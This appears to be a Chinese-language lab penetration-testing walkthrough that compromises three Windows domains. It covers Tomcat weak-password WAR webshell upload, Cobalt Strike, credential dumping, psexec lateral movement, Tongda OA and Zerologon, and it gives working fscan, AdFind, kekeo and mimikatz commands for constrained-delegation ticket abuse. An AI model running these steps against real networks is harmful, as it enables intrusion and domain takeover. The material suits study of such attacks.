下载链接: https://pan.baidu.com/s/1nUYj6G9ouj6BcumDgoDaGg 提取码: ejbn 

jishu域

windows 2008 tomcat渗透

访问发现tomcat

点击manage app

尝试弱口令进入,发现tomcat/tomcat成功进入

用哥斯拉生成后门

然后建立一个文件夹，把它放进去，把它改名为2

把它压缩为zip

然后再改名为war

上传

发现2目录

连接后上线cs

信息收集（收集敏感信息）

说明有域，但是不显示域

所以我们尝试提权

因为他已经是administraotor的权限

所以我们尝试getsystem提权

成功获取域内信息

ping一下dc

抓取明文密码

扫描端口，看有哪些存活的主机

但是cs扫描的基本端口没有数据库的端口，所以我们得自己添加

1433 sqlserver

3306 mysql

1521 oracle

5432 PostgreSQL

6379 redis

发现10和11都开了1433

所以我们尝试找到sqlserver的密码和账户

切换到C盘目录

dir /b /s web.config 寻找配置的文件

在这里发现了密码

上线sql（数据库提权）

然后建立代理，尝试用这个密码登陆对方主机的数据库

利用这个工具

成功获得权限

上线cs

横向移动dc（ipc横向移动）

用cs自带的psexec

可能有杀软

但是我不会免杀，所有我先将它关了

利用psexec就上线了

横向移动windows10

之前的账号密码都无法上线，但是我们得到了dc的账号密码，就可以通过dc的账号密码去打它然后上线

xiaoshou域

通达oa

建立socks代理

用fscan

fscan.exe -h 192.168.3.0/24 -socks5 192.168.139.129:9589

Socks5Proxy: socks5://192.168.139.129:9589

start infoscan

192.168.3.11:80 open

192.168.3.20:135 open

192.168.3.20:139 open

192.168.3.10:135 open

192.168.3.11:135 open

192.168.3.11:139 open

192.168.3.10:139 open

192.168.3.10:445 open

192.168.3.20:445 open

192.168.3.11:445 open

访问发现是通达oa的机器

首先获取cookie

成功那shell（记得用蚂蚁剑）

因为上一台有防火墙不可以反向上线，就得尝试正向上线A

成功上线

域控提权拿下域控（cve 2020 1472)

成功上线

guanli域

密码喷射（hash）拿下windows2008

约束委派攻击

AdFind -b "DC=xiaodi,DC=vpc" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

AdFind -b "DC=xiaodi,DC=vpc" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

都指向了dc

抓取明文密码（域内的用户）

1、获取fileadmin用户的票据

kekeo "tgt::ask /user:fileadmin /domain:xiaodi.vpc /NTLM:109614516980a96b5faa02f3edaddebb /ticket:administrator.kirbi" "exit"

2、利用fileadmin用户票据请求获取域控票据

kekeo "tgs::s4u /tgt:TGT_fileadmin@XIAODI.VPC_krbtgt~xiaodi.vpc@XIAODI.VPC.kirbi /user:Administrator@xiaodi.vpc /service:cifs/DC" "exit"

生成了dc的票据

导入票据

mimikatz kerberos::ptt TGS_Administrator@xiaodi.vpc@XIAODI.VPC_cifs~DC@XIAODI.VPC.kirbi

然后会发现本地有一个密码就可以密码喷射横向移动了